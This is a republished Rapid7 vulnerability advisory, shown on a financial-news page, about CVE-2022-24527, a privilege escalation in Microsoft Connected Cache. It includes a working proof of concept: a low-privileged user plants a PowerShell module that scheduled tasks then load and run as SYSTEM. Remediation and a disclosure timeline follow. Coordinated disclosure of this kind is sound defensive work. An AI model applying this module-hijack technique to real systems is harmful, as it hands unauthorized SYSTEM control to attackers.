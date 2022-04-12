Log in
    RPD   US7534221046

RAPID7, INC.

(RPD)
  Report
Real-time Estimate Cboe BZX  -  04/12 01:37:37 pm EDT
113.89 USD   +1.73%
01:22pCVE-2022-24527 : Microsoft Connected Cache Local Privilege Escalation (Fixed)
PU
10:32aRAPID7 : 3 Ways InsightIDR Users Are Achieving XDR Outcomes
PU
06:34aGoldman Sachs Downgrades Rapid7 to Neutral From Buy
MT
CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)

04/12/2022 | 01:22pm EDT
Last updated at Tue, 12 Apr 2022 17:15:25 GMT

On April 12, 2022, Microsoft published CVE-2022-24527, a local privilege escalation vulnerability in Microsoft Connected Cache. The vulnerability allowed a local low-privileged user to execute arbitrary Powershell as SYSTEM due to improper file permission assignment (CWE-732).

Product description

Connected Cache is a feature used by Microsoft Endpoint Manager "Distribution Points" to support "Delivery Optimization."

Credit

This issue was discovered and reported by security researcher Jake Baines as part of Rapid7's vulnerability disclosure program.

Exploitation

When Connected Cache is in use on a Distribution Point, it is installed, in part, into C:Doinc. Below, you can see that there are some Powershell scripts within that directory: 

C:>dir /s /b C:Doinc
C:DoincProduct
C:DoincProductInstall
C:DoincProductInstallLogs
C:DoincProductInstallTasks
C:DoincProductInstallTasksCacheNodeKeepAlive.ps1
C:DoincProductInstallTasksMaintenance.ps1
C:DoincProductInstallTasksSetDrivesToHealthy.ps1

Low-privileged users only have read and execute permissions on the Powershell scripts. 

C:DoincProductInstallTasks>icacls *.ps1
CacheNodeKeepAlive.ps1 NT AUTHORITYSYSTEM:(I)(F)
                       NT AUTHORITYNETWORK SERVICE:(I)(F)
                       BUILTINAdministrators:(I)(F)
                       BUILTINUsers:(I)(RX)

Maintenance.ps1 NT AUTHORITYSYSTEM:(I)(F)
                NT AUTHORITYNETWORK SERVICE:(I)(F)
                BUILTINAdministrators:(I)(F)
                BUILTINUsers:(I)(RX)

SetDrivesToHealthy.ps1 NT AUTHORITYSYSTEM:(I)(F)
                       NT AUTHORITYNETWORK SERVICE:(I)(F)
                       BUILTINAdministrators:(I)(F)
                       BUILTINUsers:(I)(RX)

Successfully processed 3 files; Failed processing 0 files

The Powershell scripts are executed every 60 seconds by the Task Scheduler as NT AUTHORITYSYSTEM. All that is fine. The following part is where trouble begins. This is how SetDrivesToHealthy.ps1 starts: 

try
{  
    import-module 'webAdministration'

    $error.clear()

When SetDrivesToHealthy.ps1 executes, it attempts to load the webAdministration module. Before searching the normal %PSModulePath% path, SetDrivesToHealthy.ps1 looks for the import in C:DoincProductInstallTasksWindowsPowerShellModuleswebAdministration. As we saw above, this directory doesn't exist. And while low-privileged users can't modify the Connected Cache PowerShell scripts, they do have sufficient privileges to add subdirectories and files to C:DoincProductInstallTasks: 

C:DoincProductInstall>icacls ./Tasks/
./Tasks/ NT AUTHORITYSYSTEM:(I)(OI)(CI)(F)
         NT AUTHORITYNETWORK SERVICE:(I)(OI)(CI)(F)
         BUILTINAdministrators:(I)(OI)(CI)(F)
         BUILTINUsers:(I)(OI)(CI)(RX)
         BUILTINUsers:(I)(CI)(AD)
         BUILTINUsers:(I)(CI)(WD)
         CREATOR OWNER:(I)(OI)(CI)(IO)(F)

An attacker can create the necessary directory structure and place their own webAdministration so that SetDrivesToHealthy.ps1 will import it. In the proof of concept below, the low-privileged attacker creates the directory structure and creates a PowerShell script that creates the file C:r7. 

C:DoincProductInstallTasks>dir C:
 Volume in drive C has no label.
 Volume Serial Number is 3073-81A6

 Directory of C:

01/04/2022  05:01 PM              Doinc
01/04/2022  05:15 PM              DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022  03:48 PM              inetpub
07/07/2021  04:05 AM              PerfLogs
01/05/2022  09:29 AM              Program Files
01/05/2022  09:29 AM              Program Files (x86)
01/05/2022  09:16 AM              SCCMContentLib
01/05/2022  09:15 AM              SMSPKGC$
01/05/2022  09:17 AM              SMSSIG$
01/05/2022  09:17 AM              SMS_DP$
01/04/2022  05:04 PM              Users
01/04/2022  03:48 PM              Windows
               0 File(s)              0 bytes
              12 Dir(s)  239,837,327,360 bytes free

C:DoincProductInstallTasks>mkdir WindowsPowerShell

C:DoincProductInstallTasks>mkdir WindowsPowerShellModules

C:DoincProductInstallTasks>mkdir WindowsPowerShellModuleswebAdministration

C:DoincProductInstallTasks>echo New-Item C:r7.txt > WindowsPowerShellModuleswebAdministrationwebAdministration.psm1

C:DoincProductInstallTasks>dir C:
 Volume in drive C has no label.
 Volume Serial Number is 3073-81A6

 Directory of C:

01/04/2022  05:01 PM              Doinc
01/04/2022  05:15 PM              DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022  03:48 PM              inetpub
01/05/2022  01:49 PM                 0 r7.txt
07/07/2021  04:05 AM              PerfLogs
01/05/2022  09:29 AM              Program Files
01/05/2022  09:29 AM              Program Files (x86)
01/05/2022  09:16 AM              SCCMContentLib
01/05/2022  09:15 AM              SMSPKGC$
01/05/2022  09:17 AM              SMSSIG$
01/05/2022  09:17 AM              SMS_DP$
01/04/2022  05:04 PM              Users
01/04/2022  03:48 PM              Windows
               1 File(s)              0 bytes
              12 Dir(s)  239,836,917,760 bytes free

C:DoincProductInstallTasks>icacls C:r7.txt
C:lol.txt NT AUTHORITYSYSTEM:(I)(F)
           BUILTINAdministrators:(I)(F)
           BUILTINUsers:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:DoincProductInstallTasks>

As you can see the C:r7.txt file is created, demonstrating the privilege escalation. Process monitor capture attached screenshot from the process monitor captures the PowerShell module being read in and the file being created by the SYSTEM user.

Remediation

Follow Microsoft guidance on updating the Distribution Point software. If that is not possible, disabling the caching feature will effectively mitigate this issue.

Disclosure timeline

January 5, 2022: Issue disclosed to the vendor
January 5, 2022: Vendor acknowledgement
January 6, 2022: Vendor assigns a case identifier
January 10-11, 2022: Vendor and researcher discuss clarifying details
January 19, 2022: Vendor confirms the vulnerability
February-March 2022: Vendor and researcher coordinate on disclosure date and CVE assignment
April 12, 2022: Public disclosure (this document)

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Subscribe

Disclaimer

Rapid7 Inc. published this content on 12 April 2022 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 12 April 2022 17:21:08 UTC.


© Publicnow 2022
